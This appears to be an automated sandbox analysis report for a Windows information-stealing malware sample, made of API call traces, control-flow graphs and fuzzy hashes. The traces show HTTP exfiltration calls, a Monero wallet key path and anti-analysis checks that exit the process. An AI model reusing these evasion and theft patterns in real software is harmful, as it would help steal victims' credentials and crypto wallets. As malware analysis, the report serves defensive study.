                              • GetProcAddress.KERNEL32(75A50000,015E66A0), ref: 0082A6F4
                              • GetProcAddress.KERNEL32(75A50000,015FCB98), ref: 0082A70C
                              • GetProcAddress.KERNEL32(75A50000,015FCC70), ref: 0082A724
                              • GetProcAddress.KERNEL32(75070000,015E6820), ref: 0082A746
                              • GetProcAddress.KERNEL32(75070000,015FCD78), ref: 0082A75E
                              • GetProcAddress.KERNEL32(75070000,015FCBC8), ref: 0082A776
                              • GetProcAddress.KERNEL32(75070000,015FCD18), ref: 0082A78F
                              • GetProcAddress.KERNEL32(75070000,015FCDD8), ref: 0082A7A7
                              • GetProcAddress.KERNEL32(74E50000,015E6880), ref: 0082A7C8
                              • GetProcAddress.KERNEL32(74E50000,015E69E0), ref: 0082A7E1
                              • GetProcAddress.KERNEL32(75320000,015E6760), ref: 0082A802
                              • GetProcAddress.KERNEL32(75320000,015FCBE0), ref: 0082A81A
                              • GetProcAddress.KERNEL32(6F060000,015E6A00), ref: 0082A840
                              • GetProcAddress.KERNEL32(6F060000,015E68A0), ref: 0082A858
                              • GetProcAddress.KERNEL32(6F060000,015E6A20), ref: 0082A870
                              • GetProcAddress.KERNEL32(6F060000,015FCBF8), ref: 0082A889
                              • GetProcAddress.KERNEL32(6F060000,015E6680), ref: 0082A8A1
                              • GetProcAddress.KERNEL32(6F060000,015E66C0), ref: 0082A8B9
                              • GetProcAddress.KERNEL32(6F060000,015E66E0), ref: 0082A8D2
                              • GetProcAddress.KERNEL32(6F060000,015E68E0), ref: 0082A8EA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0082A901
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0082A917
                              • GetProcAddress.KERNEL32(74E00000,015FCDA8), ref: 0082A939
                              • GetProcAddress.KERNEL32(74E00000,015F8B90), ref: 0082A951
                              • GetProcAddress.KERNEL32(74E00000,015FCD30), ref: 0082A969
                              • GetProcAddress.KERNEL32(74E00000,015FCCA0), ref: 0082A982
                              • GetProcAddress.KERNEL32(74DF0000,015E6920), ref: 0082A9A3
                              • GetProcAddress.KERNEL32(6E100000,015FCD90), ref: 0082A9C4
                              • GetProcAddress.KERNEL32(6E100000,015E6780), ref: 0082A9DD
                              • GetProcAddress.KERNEL32(6E100000,015FCAF0), ref: 0082A9F5
                              • GetProcAddress.KERNEL32(6E100000,015FCC40), ref: 0082AA0D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 19881ac7e2f48a255e9bae28d5ddf4a2ce5b1d3e67395c7a7f8c48d5e21727ab
                              • Instruction ID: 3e9180b41f778089c84f44d4c20ce6a474ed0b7fa1d4601875d0239555da69e6
                              • Opcode Fuzzy Hash: 19881ac7e2f48a255e9bae28d5ddf4a2ce5b1d3e67395c7a7f8c48d5e21727ab
                              • Instruction Fuzzy Hash: 42622BB56082809FC345DFE8FCC895A7BB9F79D7417508A1ABA09CB270D735A943CB60

                              Control-flow Graph (rendered graph not preserved in this extraction)
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00814800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                                • Part of subcall function 00814800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00814965
                              • StrCmpCA.SHLWAPI(?,015FE430), ref: 0081498A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00814B0A
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00830DDE,00000000,?,?,00000000,?,",00000000,?,015FE420), ref: 00814E38
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00814E54
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00814E68
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00814E99
                              • InternetCloseHandle.WININET(00000000), ref: 00814EFD
                              • InternetCloseHandle.WININET(00000000), ref: 00814F15
                              • HttpOpenRequestA.WININET(00000000,015FE410,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 00814B65
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • InternetCloseHandle.WININET(00000000), ref: 00814F1F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: f8c423f0115c6c177eec3dd43dd45042e8c54e55d1e369098e78f3a44f56c6e8
                              • Instruction ID: d21de9244f4b0deeb799e03cdc162ab987d39f07387b7fb0ab97b8318686b7ab
                              • Opcode Fuzzy Hash: f8c423f0115c6c177eec3dd43dd45042e8c54e55d1e369098e78f3a44f56c6e8
                              • Instruction Fuzzy Hash: 5E12EC719101289BCB18EB94EDA2FEEB379FF54310F504599B506B6191DF702B88CF62

                              Control-flow Graph (rendered graph not preserved in this extraction)
                              APIs
                                • Part of subcall function 0082AB30: lstrlen.KERNEL32(00814F55,?,?,00814F55,00830DDF), ref: 0082AB3B
                                • Part of subcall function 0082AB30: lstrcpy.KERNEL32(00830DDF,00000000), ref: 0082AB95
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825894
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008258F1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825AA7
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00825440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825478
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00825510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825568
                                • Part of subcall function 00825510: lstrlen.KERNEL32(00000000), ref: 0082557F
                                • Part of subcall function 00825510: StrStrA.SHLWAPI(00000000,00000000), ref: 008255B4
                                • Part of subcall function 00825510: lstrlen.KERNEL32(00000000), ref: 008255D3
                                • Part of subcall function 00825510: lstrlen.KERNEL32(00000000), ref: 008255FE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008259DB
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825B90
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825C5C
                              • Sleep.KERNEL32(0000EA60), ref: 00825C6B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 8b323584ebe5218c7cf9c4428b86284d4d7d483367dc5970a5951129e92b4854
                              • Instruction ID: aa9f5300944aae224c15a7ae0bbf5db13c7eb492c44ab0c0555320d4231fc8af
                              • Opcode Fuzzy Hash: 8b323584ebe5218c7cf9c4428b86284d4d7d483367dc5970a5951129e92b4854
                              • Instruction Fuzzy Hash: 3DE130719101289BCB18FBA8FDA7AED733DFF54340F408558A506E6191EF356A88CB93

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 8219f0-821a1d call 82ade0 StrCmpCA 1304 821a27-821a41 call 82ade0 1301->1304 1305 821a1f-821a21 ExitProcess 1301->1305 1309 821a44-821a48 1304->1309 1310 821c12-821c1d call 82ab10 1309->1310 1311 821a4e-821a61 1309->1311 1313 821a67-821a6a 1311->1313 1314 821bee-821c0d 1311->1314 1316 821b82-821b93 StrCmpCA 1313->1316 1317 821b63-821b74 StrCmpCA 1313->1317 1318 821bc0-821bd1 StrCmpCA 1313->1318 1319 821b41-821b52 StrCmpCA 1313->1319 1320 821ba1-821bb2 StrCmpCA 1313->1320 1321 821a85-821a94 call 82ab30 1313->1321 1322 821acf-821ae0 StrCmpCA 1313->1322 1323 821aad-821abe StrCmpCA 1313->1323 1324 821a71-821a80 call 82ab30 1313->1324 1325 821a99-821aa8 call 82ab30 1313->1325 1326 821b1f-821b30 StrCmpCA 1313->1326 1327 821bdf-821be9 call 82ab30 1313->1327 1328 821afd-821b0e StrCmpCA 1313->1328 1314->1309 1335 821b95-821b98 1316->1335 1336 821b9f 1316->1336 1333 821b80 1317->1333 1334 821b76-821b79 1317->1334 1340 821bd3-821bd6 1318->1340 1341 821bdd 1318->1341 1331 821b54-821b57 1319->1331 1332 821b5e 1319->1332 1337 821bb4-821bb7 1320->1337 1338 821bbe 1320->1338 1321->1314 1348 821ae2-821aec 1322->1348 1349 821aee-821af1 1322->1349 1346 821ac0-821ac3 1323->1346 1347 821aca 1323->1347 1324->1314 1325->1314 1329 821b32-821b35 1326->1329 1330 821b3c 1326->1330 1327->1314 1350 821b10-821b13 1328->1350 1351 821b1a 1328->1351 1329->1330 1330->1314 1331->1332 1332->1314 1333->1314 1334->1333 1335->1336 1336->1314 1337->1338 1338->1314 1340->1341 1341->1314 1346->1347 1347->1314 1355 821af8 1348->1355 1349->1355 1350->1351 1351->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00821A15
                              • ExitProcess.KERNEL32 ref: 00821A21
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 984ccd8a40542492845a6d68694d08657260282024a09124a393dd69682ae485
                              • Instruction ID: 27543d7097bb185256f7d3bf5f6fe37aca13c805411589360b1bc708337860ab
                              • Opcode Fuzzy Hash: 984ccd8a40542492845a6d68694d08657260282024a09124a393dd69682ae485
                              • Instruction Fuzzy Hash: 8C514078A04219AFCF04DFE4E998AAE77B9FF54704F604148E512EB250E774E981CB52

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0750), ref: 00829BF1
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0570), ref: 00829C0A
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F07C8), ref: 00829C22
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F05A0), ref: 00829C3A
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F07F8), ref: 00829C53
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F8B50), ref: 00829C6B
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015E64E0), ref: 00829C83
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015E6300), ref: 00829C9C
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F05B8), ref: 00829CB4
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0678), ref: 00829CCC
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F05E8), ref: 00829CE5
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0588), ref: 00829CFD
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015E6320), ref: 00829D15
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0600), ref: 00829D2E
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 008111D0: ExitProcess.KERNEL32 ref: 00811211
                                • Part of subcall function 00811160: GetSystemInfo.KERNEL32(?), ref: 0081116A
                                • Part of subcall function 00811160: ExitProcess.KERNEL32 ref: 0081117E
                                • Part of subcall function 00811110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0081112B
                                • Part of subcall function 00811110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00811132
                                • Part of subcall function 00811110: ExitProcess.KERNEL32 ref: 00811143
                                • Part of subcall function 00811220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0081123E
                                • Part of subcall function 00811220: ExitProcess.KERNEL32 ref: 00811294
                                • Part of subcall function 00826A10: GetUserDefaultLangID.KERNEL32 ref: 00826A14
                                • Part of subcall function 00811190: ExitProcess.KERNEL32 ref: 008111C6
                                • Part of subcall function 008279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827A10
                                • Part of subcall function 008279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00827A17
                                • Part of subcall function 008279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00827A2F
                                • Part of subcall function 00827A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827AA0
                                • Part of subcall function 00827A70: RtlAllocateHeap.NTDLL(00000000), ref: 00827AA7
                                • Part of subcall function 00827A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00827ABF
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015F8BA0,?,008310F4,?,00000000,?,008310F8,?,00000000,00830AF3), ref: 00826D6A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826D88
                              • CloseHandle.KERNEL32(00000000), ref: 00826D99
                              • Sleep.KERNEL32(00001770), ref: 00826DA4
                              • CloseHandle.KERNEL32(?,00000000,?,015F8BA0,?,008310F4,?,00000000,?,008310F8,?,00000000,00830AF3), ref: 00826DBA
                              • ExitProcess.KERNEL32 ref: 00826DC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: 251b7b3e76787050e5ab25cab7724b31ddadd2fcaed94ace421093fb333cb668
                              • Instruction ID: e67dbda377f51459e01fbb44c7ed419a378bec45cf22b44278a287389769301b
                              • Opcode Fuzzy Hash: 251b7b3e76787050e5ab25cab7724b31ddadd2fcaed94ace421093fb333cb668
                              • Instruction Fuzzy Hash: 20310770A04228ABCB08FBE8EC66AEE7379FF44310F400918F512E6191EF706985C663

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 826d93 1437 826daa 1436->1437 1439 826d5a-826d77 call 82ade0 OpenEventA 1437->1439 1440 826dac-826dc2 call 826bc0 call 825d60 CloseHandle ExitProcess 1437->1440 1445 826d95-826da4 CloseHandle Sleep 1439->1445 1446 826d79-826d91 call 82ade0 CreateEventA 1439->1446 1445->1437 1446->1440
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015F8BA0,?,008310F4,?,00000000,?,008310F8,?,00000000,00830AF3), ref: 00826D6A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826D88
                              • CloseHandle.KERNEL32(00000000), ref: 00826D99
                              • Sleep.KERNEL32(00001770), ref: 00826DA4
                              • CloseHandle.KERNEL32(?,00000000,?,015F8BA0,?,008310F4,?,00000000,?,008310F8,?,00000000,00830AF3), ref: 00826DBA
                              • ExitProcess.KERNEL32 ref: 00826DC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 846f669d699c0bedbeeb1ce6b3197170266dca56a08329fde27951252fbbc154
                              • Instruction ID: 1313a5689c4aac86194dfae74d602ad64e2f424b658b93e9f71b8d88e0b83cc4
                              • Opcode Fuzzy Hash: 846f669d699c0bedbeeb1ce6b3197170266dca56a08329fde27951252fbbc154
                              • Instruction Fuzzy Hash: 10F03A30A4822DEFEB04EBE0FC4ABBD3274FF04705F500615B912E91A0EBB15981CA52

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 5610472ce2b1f5a223d61fb9bccafe3ba16aa15ae55d0d8d0b6ae460f4e2d286
                              • Instruction ID: 64b622a4526161c7e5afba59b7271c84d6b906f89cdfd4882e9e16d96bf482eb
                              • Opcode Fuzzy Hash: 5610472ce2b1f5a223d61fb9bccafe3ba16aa15ae55d0d8d0b6ae460f4e2d286
                              • Instruction Fuzzy Hash: 12215EB1D00209ABDF14DFA5EC49ADE7B75FF04320F408625F915A7290EB706A0ACB81

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 008162D0: InternetOpenA.WININET(00830DFF,00000001,00000000,00000000,00000000), ref: 00816331
                                • Part of subcall function 008162D0: StrCmpCA.SHLWAPI(?,015FE430), ref: 00816353
                                • Part of subcall function 008162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00816385
                                • Part of subcall function 008162D0: HttpOpenRequestA.WININET(00000000,GET,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 008163D5
                                • Part of subcall function 008162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0081640F
                                • Part of subcall function 008162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816421
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825478
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
